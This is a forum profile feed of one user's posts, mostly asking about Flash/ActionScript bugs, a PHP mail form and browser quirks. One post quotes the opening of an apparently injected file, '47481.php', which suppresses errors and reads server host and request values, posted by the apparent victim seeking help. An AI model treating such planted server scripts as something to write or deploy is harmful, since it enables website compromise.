i have a bar preloader that becomes longer as the site loads. but it starts in the center and moves outward, so it's not left to right.
i'm using an alpha gradient blend on the bar because the site will be windowless transparent, so i can't use/programatically move some basic white hiders with gradient edges.
because i'm using alpha transparency blend modes, i have to have a separate MC just for the bar and the 2 left and...
User Profile
Collapse
-
Perload With Separate MC?
-
nevermind... my host server contacted me saying "it should work now"... so clearly the script is fine and that the fault lies with them... and yes, it does work now... -
Why Does My PHP Script No Longer Work?
i wrote a custom PHP script last year and everything worked perfectly... recently my webserver upgraded to PHP 5 and now my script doesn't work properly.
what the script does is: users fill out info and optionally can upload images, the user receives and email receipt of all the data they just submitted, and i'm suppose to receive their information in my email.
what still works is that the user will receive their receipt... -
it seems my flash install is crazy... i switched my movie properties from AS2 to AS3, and then back again, and now everything works as expected... strange...Leave a comment:
-
to do what you require, you need to set up 3 things:
1- a form made up of Input Text boxes, etc, and assign each form item a "Var" name (not the same thing as an instance name)... you can set your Var in the Properties tab.
2- an external PHP script.
3- a button (in flash) directing your form variables to the PHP script.
there is a very basic tutorial here that will teach you...Leave a comment:
-
how is it possible to format a number for a dynamic textbox to always display at 2 decimal points using Actionscript 2.0.
for this code, the dynamic text box is 2 levels deep (or whatever) as you can tell by the path...
yeah, and my code totally doesn't work at all...Code:var decimals = _root.DisplayMC.Display = 9; decimals.toFixed(2);
any thoughts?Leave a comment:
-
Here is a small FLA file which shows you what i'm trying to do:
essentially there's an if/else statement block on the button, but the main timeline stops at frame 40.
i'm trying to make the button direct the playhead to the "Red" frame label within the MC movie clip, but anyway i try to write it it just isn't working. i know i can do this by not making a MC in the first place and just use the main timeline,...Leave a comment:
-
yes, it's in the same scene... i have no idea why something so simple is not working... it's making me crazy...Leave a comment:
-
nope, doesn't work... i've tried this. _root.this.goto AndPlay("Near End"); _root.MovieClip 1.gotoAndPlay(" Near End");... nothing works... i'm wondering if i need to somehow change the properties of the MovieClip1 MC, so that actionscript can use it? i've called the MovieClip1 instance onstage "MovieClip1 " but it's just not being called....Leave a comment:
-
movieclip.gotoAndPlay
ok... i've been trying to make this work for 2 days:
i have a scene with a button and a movie clip. the movie clip is called "MovieClip1 ". within the movie clip i've labeled a frame late in the clip called "Near End". i want my button to make the playhead goto that labeled frame within the movie clip but it does not.
the button has the following actionscript 2.0:
...Code:on (release)
-
ok i'll ask them about it... i'm not with godaddy, but i'm with a canadian host serve who i believe is the canadian version of godaddy... their sites look the same anyway... thanks for your input...Leave a comment:
-
i'm not hosted by godaddy. why?
isn't the mysterious php script something to do with error reporting? maybe i have an option selected in the site's control panel? can't you see the code of the mysterious php script that i listed in the first post? i just want to know what this code means......Leave a comment:
-
my site doesn't even receive any visitors... and no one uploaded any images to my site yet... it's all pretty new... i don't think i was hacked....Leave a comment:
-
i use a javascript validation in the user form, the file has to have a specific extension... i know it's not the most secure thing, but this is beside the point, since the above mentioned mysterious php script that is occurring is happening in my own folder, with my own php script, that only i can use and have access to....Leave a comment:
-
hi there... yes i allow people to upload certain image files into a specific folder on the server... but the above php script is located in different folders that that only i use to send out automatic emails to users notifying them that their file was received, or that their order is ready, etc. you see, i built some little html forms that only i can fill out (with a user's name, email, etc.) which will send formulated emails to clients, and it...Leave a comment:
-
mysteriously added php script
hi everyone... i've recently noticed some strange .php scripts that are automatically added to some folders on my server... this one is called "47481.php"
...Code:<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])
-
i discovered the problem is because i'm using SWFAddress, and that flash movies with anchors "#" in the address makes it go all crazy... i'm still trying to fix it... attempting the "satay method": http://www.adobe.com/devnet/dreamwea...ash_satay.html
and yes, i'm using Flash CS3......Leave a comment:
-
IE7 Skips Preloader (but does load movie)
hi there... i'm having a new strange problem with my flash site... IE7 seems to not display my preloader but instead loads the movie with a white screen... the movie does load though...
this is a new problem, as it never use to happen before... it use to show everything... does anyone know why this suddenly started to happen? i've cleared the cache... could this be an issue with Flash CS3? any help would be GREATLY appreciated, as... -
yeah i tried that... i changed every possible option of a form submission... Apple Mail just will not post anything...
i've also discovered that Apple Mail will not use javascript in HTML email also... strange by true......Leave a comment:
-
hey pbmods... thanks for the reply... i suppose your right about it being a security issue... it works when using webmail systems like Gmail, as it will prompt an alert stating "you are about to send information over the internet, do you want to continue?"... it's just unfortunate (i guess) that Apple Mail will not display this alert, and just ignores any PHP post data all together...
it's not really a huge deal for me......Leave a comment:
No activity results to display
Show More
Leave a comment: